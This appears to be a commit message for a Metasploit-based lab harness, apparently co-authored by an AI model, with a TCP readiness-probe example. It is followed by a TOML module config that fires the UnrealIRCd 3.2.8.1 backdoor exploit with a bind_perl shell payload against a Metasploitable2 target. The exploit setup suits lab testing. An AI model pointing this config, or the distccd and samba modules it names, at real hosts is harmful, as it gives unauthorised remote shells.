Bug 10: _wait_for_tcp returned on recv()→b'' (connection closed by peer),
falsely signalling service-ready. Only socket.timeout or non-empty data
are genuine ready signals; b'' now retries.
Bug 11: distccd_command_exec and unreal_ircd_3281_backdoor incorrectly
had requires_bridge=true. bind_perl payloads connect inward (host→guest
via hostfwd), not outward — no bridge egress needed. Both modules now
run on SLIRP-only fleet slots.
Bug 12: msgpack.unpackb crashed on integer session IDs from msfrpcd 6.x
(strict_map_key=True default). Added strict_map_key=False.
Bug 13 (documented): samba_usermap_script removed from catalog (NoReply
on every fire — already handled in dca6144 on origin/main).
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
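The Bug 10 rule from the commit message above, as an added example that is not part of the commit or the project's code: a readiness probe that retries when recv() returns b'' and only reports ready on a receive timeout or on real data. The names wait_for_tcp and start_flaky_listener, their parameters, the "banner"/"silent" return labels and the loopback test peer are assumptions made for illustration.

```python
import socket
import threading
import time


def wait_for_tcp(host, port, deadline_s=5.0, probe_s=0.3, retry_s=0.05):
    """Return "banner" or "silent" once a service holds the port open."""
    end = time.monotonic() + deadline_s
    while time.monotonic() < end:
        try:
            with socket.create_connection((host, port), timeout=probe_s) as s:
                s.settimeout(probe_s)
                try:
                    data = s.recv(1)
                except socket.timeout:
                    return "silent"  # held open, waiting for the client to speak
                if data:
                    return "banner"  # the service spoke first
                # data == b"": peer closed the connection, so nothing is serving yet
        except OSError:
            pass  # refused, reset or connect timeout: not listening yet
        time.sleep(retry_s)
    raise TimeoutError(f"{host}:{port} not ready after {deadline_s}s")


def start_flaky_listener(close_first, banner=b""):
    """Constructed peer: closes the first `close_first` connections, then serves."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    seen = []  # keeps accepted sockets referenced so they stay open

    def loop():
        while True:
            conn, _ = srv.accept()
            seen.append(conn)
            if len(seen) <= close_first:
                conn.close()  # client sees recv() == b""
            elif banner:
                conn.sendall(banner)

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], seen


if __name__ == "__main__":
    port, seen = start_flaky_listener(2, b"NOTICE AUTH :constructed banner\r\n")
    print(wait_for_tcp("127.0.0.1", port), "after", len(seen), "connections")
```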
28 lines
649 B
TOML
description = """
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
shipped to the official mirrors carried a backdoor that runs an
arbitrary command on receipt of a magic AB; payload string. Once
the backdoor was discovered the official tarball was pulled, but
Metasploitable2 still ships the trojaned build. Returns a shell on
the IRC user.
"""

[module]
type = "exploit"
path = "unix/irc/unreal_ircd_3281_backdoor"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 6667

[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4446

[session]
type = "shell"

[runtime]
requires_bridge = false
extra_target_ports = [4446]